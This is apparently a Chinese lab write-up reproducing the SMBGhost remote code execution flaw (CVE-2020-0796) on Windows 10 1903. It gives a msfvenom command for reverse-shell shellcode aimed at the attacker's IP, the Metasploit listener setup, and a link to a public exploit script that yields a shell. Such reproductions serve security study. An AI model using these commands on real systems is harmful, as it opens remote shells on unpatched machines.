smbghost_rce复现(cve-2020-0796)

0x00 环境

靶机:win10 1903 IP:192.168.0.105
攻击机:kali IP:192.168.0.104

0x01 msfvenom生成reversed shellcode

msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.0.104 LPORT=5001 -f python -o demo.py

将生成demo.py中的shellcode替换exploit.py中的shellcode
smbghost_rce复现(cve-2020-0796)_第1张图片(替换时建议用txt ctrl+h直接替换)
smbghost_rce复现(cve-2020-0796)_第2张图片

0x02 msf监听

use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost=192.168.0.104
set lport=5001
exploit

(与msfvenom生成shellcode时的lohost、loport相同)
smbghost_rce复现(cve-2020-0796)_第3张图片在这里插入图片描述

0x03 Getshell

运行脚本exploit.py,成功获取reversed shell,exp更新后比较稳定,几乎不会蓝屏
smbghost_rce复现(cve-2020-0796)_第4张图片smbghost_rce复现(cve-2020-0796)_第5张图片
漏洞利用脚本:
https://github.com/chompie1337/SMBGhost_RCE_PoC

你可能感兴趣的:(漏洞复现,安全)